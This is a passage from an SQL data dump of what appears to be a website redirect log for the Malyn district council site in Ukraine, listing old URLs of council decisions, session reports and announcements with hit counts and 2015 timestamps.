00:00:00',301),(18239,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=664:-------------l-r-lr&catid=41:--27042012-&Itemid=78&lang=uk','','','',5,0,'2015-11-12 02:01:47','0000-00-00 00:00:00',301),(18240,'http://malyn-rayrada.org.ua/index.php/1192-u-chajki-bronza-v-urozhayu-novij-stadion','','','',15,0,'2015-11-12 02:05:31','0000-00-00 00:00:00',301),(18241,'http://malyn-rayrada.org.ua/index.php/1057-vidbulas-38-sesiya-rajonnoji-radi','','','',7,0,'2015-11-12 02:05:31','0000-00-00 00:00:00',301),(18242,'http://malyn-rayrada.org.ua/index.php/1105-vidnovleno-avtobusnij-marshrut','','','',6,0,'2015-11-12 02:05:31','0000-00-00 00:00:00',301),(18243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2015-11-12 02:05:33','0000-00-00 00:00:00',301),(18244,'http://www.malyn-rayrada.org.ua/index.php/1172-vidbulas-41-sesiya-rajonnoji-radi','','','',27,0,'2015-11-12 02:22:16','0000-00-00 00:00:00',301),(18245,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',14,0,'2015-11-12 02:37:50','0000-00-00 00:00:00',301),(18246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=635:------------2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-11-12 03:27:21','0000-00-00 00:00:00',301),(18247,'http://malyn-rayrada.org.ua/index.php/1014-20-lyutogo-2015-roku-blagodijnij-kontsert-povertajsya-zhivim','','','',8,0,'2015-11-12 03:27:45','0000-00-00 00:00:00',301),(18248,'http://malyn-rayrada.org.ua/index.php/475-vidbulas-pozachergova-19-sesija-rajonnoi-radi','','','',9,0,'2015-11-12 03:27:50','0000-00-00 00:00:00',301),(18249,'http://malyn-rayrada.org.ua/index.php/1082-pro-sklikannya-39-sesiji-rajonnoji-radi-6-sklikannya','','','',4,0,'2015-11-12 03:27:53','0000-00-00 00:00:00',301),(18250,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=14','','','',3,0,'2015-11-12 03:32:47','0000-00-00 00:00:00',301),(18251,'http://malyn-rayrada.org.ua/index.php/967-vidbulas-36-sesiya-rajonnoji-radi','','','',7,0,'2015-11-12 04:09:44','0000-00-00 00:00:00',301),(18252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2015-11-12 04:16:38','0000-00-00 00:00:00',301),(18253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-11-12 04:40:46','0000-00-00 00:00:00',301),(18254,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-12 05:03:09','0000-00-00 00:00:00',301),(18255,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=543:2012-01-26-11-58-53&lang=ru&option=com_content&view=article','','','',5,0,'2015-11-12 05:03:10','0000-00-00 00:00:00',301),(18256,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=15','','','',1,0,'2015-11-12 05:28:23','0000-00-00 00:00:00',301),(18257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=418:2011-09-29-08-40-03&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-11-12 05:56:50','0000-00-00 00:00:00',301),(18258,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Тиднюк.pdf','','','',7,0,'2015-11-12 06:00:17','0000-00-00 00:00:00',301),(18259,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=480:2011-11-28-10-11-58&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-12 06:41:51','0000-00-00 00:00:00',301),(18260,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=197:-----l-r--2004-2010-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-12 06:41:52','0000-00-00 00:00:00',301),(18261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=251:-2010-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2015-11-12 07:23:00','0000-00-00 00:00:00',301),(18262,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/179-pro-nadannja-zgodi-na-peredachu-traktora','','','',5,0,'2015-11-12 07:40:33','0000-00-00 00:00:00',301),(18265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33&Itemid=66&lang=uk','','','',8,0,'2015-11-12 08:30:11','0000-00-00 00:00:00',301),(18266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=472:-l-r-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-12 08:33:24','0000-00-00 00:00:00',301),(18267,'http://www.malyn-rayrada.org.ua/index.php/627-informacija-pro-vikonannja-dohidnoi-chastini','','','',7,0,'2015-11-12 09:03:25','0000-00-00 00:00:00',301),(18268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=42:--16052012-&Itemid=80&lang=ru','','','',7,0,'2015-11-12 09:06:38','0000-00-00 00:00:00',301),(18271,'http://malyn-rayrada.org.ua/index.php/1082-pro-sklikannya-39-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 09:59:04','0000-00-00 00:00:00',301),(18272,'http://malyn-rayrada.org.ua/index.php/1092-ogoloshennya-malinskoji-rajonnoji-blagodijnoji-organizatsiji-zakhist-ditej-chornobilya-shchodo-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 09:59:07','0000-00-00 00:00:00',301),(18273,'http://malyn-rayrada.org.ua/index.php/463-sogodni-pravoslavni-hristijani-vidznachajut-verbnu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:00:03','0000-00-00 00:00:00',301),(18274,'http://malyn-rayrada.org.ua/index.php/499-za-materialami-zvernen-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:05','0000-00-00 00:00:00',301),(18275,'http://malyn-rayrada.org.ua/index.php/502-informacija-pro-provedennja-aukcionu-gazeta','','','',7,0,'2015-11-12 10:00:06','0000-00-00 00:00:00',301),(18276,'http://malyn-rayrada.org.ua/index.php/502-informacija-pro-provedennja-aukcionu-gazeta?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:08','0000-00-00 00:00:00',301),(18277,'http://malyn-rayrada.org.ua/index.php/517-vidbulas-20-sesija-rajonnoi-radi','','','',4,0,'2015-11-12 10:00:09','0000-00-00 00:00:00',301),(18278,'http://malyn-rayrada.org.ua/index.php/522-nardep-v-s-zhuravskij-prosit-vid-m-ja-azarova?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:11','0000-00-00 00:00:00',301),(18279,'http://malyn-rayrada.org.ua/index.php/613-upravlinnja-statistiki-informue_2','','','',4,0,'2015-11-12 10:00:12','0000-00-00 00:00:00',301),(18280,'http://malyn-rayrada.org.ua/index.php/626-vidbulos-zasidannja-koordinacijnoi-radi-pri-golovi','','','',10,0,'2015-11-12 10:00:14','0000-00-00 00:00:00',301),(18281,'http://malyn-rayrada.org.ua/index.php/627-informacija-pro-vikonannja-dohidnoi-chastini','','','',11,0,'2015-11-12 10:00:15','0000-00-00 00:00:00',301),(18282,'http://malyn-rayrada.org.ua/index.php/627-informacija-pro-vikonannja-dohidnoi-chastini?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:00:17','0000-00-00 00:00:00',301),(18283,'http://malyn-rayrada.org.ua/index.php/628-girnichovidobuvni-pidpriemstva-oblasti-pid?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:00:18','0000-00-00 00:00:00',301),(18284,'http://malyn-rayrada.org.ua/index.php/632-zavershilas-pidgotovka-do-provedennja-24-sesii','','','',5,0,'2015-11-12 10:00:20','0000-00-00 00:00:00',301),(18285,'http://malyn-rayrada.org.ua/index.php/633-informacija-shhodo-vnesennja-zmin-v-bjudzhet-2013','','','',8,0,'2015-11-12 10:00:21','0000-00-00 00:00:00',301),(18286,'http://malyn-rayrada.org.ua/index.php/637-vidbulos-zasidannja-24-sesii-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:00:23','0000-00-00 00:00:00',301),(18287,'http://malyn-rayrada.org.ua/index.php/638-perevedit-strilki-godinnikiv-na-1-godinu-nazad?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:00:26','0000-00-00 00:00:00',301),(18288,'http://malyn-rayrada.org.ua/index.php/640-upravlinnja-statistiki-informue_3','','','',11,0,'2015-11-12 10:00:28','0000-00-00 00:00:00',301),(18289,'http://malyn-rayrada.org.ua/index.php/641-pitannja-rozrahunkiv-rozporjadnikiv-koshtiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-12 10:00:29','0000-00-00 00:00:00',301),(18290,'http://malyn-rayrada.org.ua/index.php/664-ogoloshennja_11','','','',5,0,'2015-11-12 10:00:31','0000-00-00 00:00:00',301),(18291,'http://malyn-rayrada.org.ua/index.php/712-verhovna-rada-povernula-konstituciju-2004-roku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:32','0000-00-00 00:00:00',301),(18292,'http://malyn-rayrada.org.ua/index.php/775-pro-sklikannja-30-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:00:33','0000-00-00 00:00:00',301),(18293,'http://malyn-rayrada.org.ua/index.php/797-vidbulas-koordinacijna-rada-pri-golovi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:35','0000-00-00 00:00:00',301),(18294,'http://malyn-rayrada.org.ua/index.php/843-vistup-prezidenta-na-paradi-na-chest-23-i-richnici','','','',5,0,'2015-11-12 10:00:41','0000-00-00 00:00:00',301),(18295,'http://malyn-rayrada.org.ua/index.php/843-vistup-prezidenta-na-paradi-na-chest-23-i-richnici?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:44','0000-00-00 00:00:00',301),(18296,'http://malyn-rayrada.org.ua/index.php/874-vidbulas-33-pozachergova-sesiya-rajonnoji-radi','','','',5,0,'2015-11-12 10:00:47','0000-00-00 00:00:00',301),(18297,'http://malyn-rayrada.org.ua/index.php/874-vidbulas-33-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:49','0000-00-00 00:00:00',301),(18298,'http://malyn-rayrada.org.ua/index.php/875-ogoloshennya','','','',32,0,'2015-11-12 10:00:50','0000-00-00 00:00:00',301),(18299,'http://malyn-rayrada.org.ua/index.php/875-ogoloshennya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:51','0000-00-00 00:00:00',301),(18300,'http://malyn-rayrada.org.ua/index.php/883-vitaemo-osvityan-iz-profesijnim-svyatom?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:56','0000-00-00 00:00:00',301),(18301,'http://malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:00:58','0000-00-00 00:00:00',301),(18302,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',4,0,'2015-11-12 10:01:13','0000-00-00 00:00:00',301),(18303,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:15','0000-00-00 00:00:00',301),(18304,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',4,0,'2015-11-12 10:01:17','0000-00-00 00:00:00',301),(18305,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:18','0000-00-00 00:00:00',301),(18306,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',4,0,'2015-11-12 10:01:20','0000-00-00 00:00:00',301),(18307,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:22','0000-00-00 00:00:00',301),(18308,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1085-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-andrijchuk-t-i-ta-gr-andrijchuk-v-i','','','',4,0,'2015-11-12 10:01:23','0000-00-00 00:00:00',301),(18309,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:25','0000-00-00 00:00:00',301),(18310,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/960-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2015-2017-roki','','','',5,0,'2015-11-12 10:01:27','0000-00-00 00:00:00',301),(18311,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna','','','',6,0,'2015-11-12 10:01:29','0000-00-00 00:00:00',301),(18312,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:32','0000-00-00 00:00:00',301),(18313,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/962-pro-vstanovlennya-orendnoji-plati','','','',6,0,'2015-11-12 10:01:34','0000-00-00 00:00:00',301),(18314,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/962-pro-vstanovlennya-orendnoji-plati?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:36','0000-00-00 00:00:00',301),(18315,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku','','','',5,0,'2015-11-12 10:01:39','0000-00-00 00:00:00',301),(18316,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:41','0000-00-00 00:00:00',301),(18317,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/964-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-gr-baranovskomu-m-m','','','',4,0,'2015-11-12 10:01:43','0000-00-00 00:00:00',301),(18318,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/965-pro-vnesennya-zmin-do-kompleksnoji-dovgostrokovoji-programi-rozvitku-zemelnikh-vidnosin-ta-okhoroni-zemel-u-malinskomu-rajoni-na-2007-2015-roki','','','',4,0,'2015-11-12 10:01:45','0000-00-00 00:00:00',301),(18319,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/557-pro-zatverdzhennja-rozporjadzhennja-golovi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:01:48','0000-00-00 00:00:00',301),(18320,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/594-pro-zatverdzhennja-rozmiru-vartosti-produktiv_4','','','',4,0,'2015-11-12 10:01:50','0000-00-00 00:00:00',301),(18321,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/605-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2013','','','',4,0,'2015-11-12 10:01:52','0000-00-00 00:00:00',301),(18322,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/678-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_23?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:02:01','0000-00-00 00:00:00',301),(18323,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/453-pro-nadannja-zgodi-na-provedennja-kapitalnogo','','','',8,0,'2015-11-12 10:02:13','0000-00-00 00:00:00',301),(18324,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/476-pro-nadannja-dozvolu-na-vlashtuvannja-marchenko-v','','','',8,0,'2015-11-12 10:02:15','0000-00-00 00:00:00',301),(18325,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/846-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu_2','','','',5,0,'2015-11-12 10:02:20','0000-00-00 00:00:00',301),(18326,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/846-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:02:22','0000-00-00 00:00:00',301),(18327,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/847-pro-vnesennja-zmin-do-rajonnoi-programi_5','','','',5,0,'2015-11-12 10:02:24','0000-00-00 00:00:00',301),(18328,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/847-pro-vnesennja-zmin-do-rajonnoi-programi_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:02:27','0000-00-00 00:00:00',301),(18329,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/850-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_4','','','',5,0,'2015-11-12 10:02:29','0000-00-00 00:00:00',301),(18330,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/850-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:02:31','0000-00-00 00:00:00',301),(18331,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/451-pro-vnesennja-dopovnennja-do-programi?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:02:40','0000-00-00 00:00:00',301),(18332,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/461-pro-vnesennja-dopovnennja-do-rajonnoi-kompleksnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:02:43','0000-00-00 00:00:00',301),(18333,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?limitstart=0','','','',7,0,'2015-11-12 10:02:47','0000-00-00 00:00:00',301),(18334,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=10','','','',7,0,'2015-11-12 10:02:50','0000-00-00 00:00:00',301),(18335,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=15','','','',7,0,'2015-11-12 10:02:52','0000-00-00 00:00:00',301),(18336,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=5','','','',7,0,'2015-11-12 10:02:54','0000-00-00 00:00:00',301),(18337,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=7','','','',7,0,'2015-11-12 10:02:56','0000-00-00 00:00:00',301),(18338,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/360-pro-vnesennja-zmin-do-polozhennja-pro-postijni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:02:59','0000-00-00 00:00:00',301),(18339,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/362-pro-zminu-nazvi-nedashkivskoi-zosh-i-iii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:01','0000-00-00 00:00:00',301),(18340,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/370-pro-zatverdzhennja-spisku-prisjazhnih-malinskogo?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:03:04','0000-00-00 00:00:00',301),(18341,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/377-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:06','0000-00-00 00:00:00',301),(18342,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/378-pro-vstanovlennja-mezh-silskih-naselenih-punktiv?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:03:08','0000-00-00 00:00:00',301),(18343,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/379-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_9','','','',10,0,'2015-11-12 10:03:10','0000-00-00 00:00:00',301),(18344,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/384-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:12','0000-00-00 00:00:00',301),(18345,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/392-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_15?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:03:15','0000-00-00 00:00:00',301),(18346,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?limitstart=0','','','',5,0,'2015-11-12 10:03:17','0000-00-00 00:00:00',301),(18347,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=25','','','',5,0,'2015-11-12 10:03:19','0000-00-00 00:00:00',301),(18348,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=30','','','',7,0,'2015-11-12 10:03:21','0000-00-00 00:00:00',301),(18349,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=5','','','',5,0,'2015-11-12 10:03:24','0000-00-00 00:00:00',301),(18350,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=7','','','',5,0,'2015-11-12 10:03:26','0000-00-00 00:00:00',301),(18351,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/735-pro-skasuvannja-rishen-rajonnoi-radi-vid-25?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:28','0000-00-00 00:00:00',301),(18352,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/736-pro-zatverdzhennja-polozhennja-pro-konkursnij_2?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:03:31','0000-00-00 00:00:00',301),(18353,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/739-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_5','','','',9,0,'2015-11-12 10:03:33','0000-00-00 00:00:00',301),(18354,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-?start=5','','','',2,0,'2015-11-12 10:03:35','0000-00-00 00:00:00',301),(18355,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/108-pro-hid-vikonannja-rajonnoi-programi-ohoroni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:41','0000-00-00 00:00:00',301),(18356,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/109-pro-programu-zabezpechennja-bezpeki-pri-vijavlenni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:43','0000-00-00 00:00:00',301),(18357,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/110-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi','','','',4,0,'2015-11-12 10:03:45','0000-00-00 00:00:00',301),(18358,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/111-pro-plan-roboti-rajonnoi-radi-na-i-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:03:47','0000-00-00 00:00:00',301),(18359,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/114-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi','','','',10,0,'2015-11-12 10:03:49','0000-00-00 00:00:00',301),(18360,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/115-pro-ugodu-mizh-rajonnoju-ta-silskimi-selishhnimi?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:03:52','0000-00-00 00:00:00',301),(18361,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/160-pro-stan-rozrahunkiv-za-majnovi-ta-zemelni-pai','','','',4,0,'2015-11-12 10:03:54','0000-00-00 00:00:00',301),(18362,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/161-pro-peredachu-chastini-primishhennja-vorsivskoi','','','',4,0,'2015-11-12 10:03:56','0000-00-00 00:00:00',301),(18363,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/167-pro-viplatu-odnorazovoi-groshovoi-dopomogi','','','',4,0,'2015-11-12 10:03:58','0000-00-00 00:00:00',301),(18364,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/228-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_4','','','',4,0,'2015-11-12 10:04:05','0000-00-00 00:00:00',301),(18365,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/34-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja','','','',4,0,'2015-11-12 10:04:07','0000-00-00 00:00:00',301),(18366,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/533-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:10','0000-00-00 00:00:00',301),(18367,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/535-pro-hid-vikonannja-programi-reformuvannja-i','','','',4,0,'2015-11-12 10:04:11','0000-00-00 00:00:00',301),(18368,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/535-pro-hid-vikonannja-programi-reformuvannja-i?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:13','0000-00-00 00:00:00',301),(18369,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/536-pro-hid-vikonannja-rajonnoi-programi-zaluchennja_2','','','',4,0,'2015-11-12 10:04:14','0000-00-00 00:00:00',301),(18370,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/536-pro-hid-vikonannja-rajonnoi-programi-zaluchennja_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:16','0000-00-00 00:00:00',301),(18371,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/541-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_12','','','',5,0,'2015-11-12 10:04:19','0000-00-00 00:00:00',301),(18372,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/542-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_20','','','',5,0,'2015-11-12 10:04:20','0000-00-00 00:00:00',301),(18373,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/543-pro-peredachu-traktora','','','',5,0,'2015-11-12 10:04:22','0000-00-00 00:00:00',301),(18374,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/544-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_2','','','',4,0,'2015-11-12 10:04:24','0000-00-00 00:00:00',301),(18375,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/545-pro-vnesennja-zmin-do-rajonnoi-cilovoi-programi','','','',5,0,'2015-11-12 10:04:25','0000-00-00 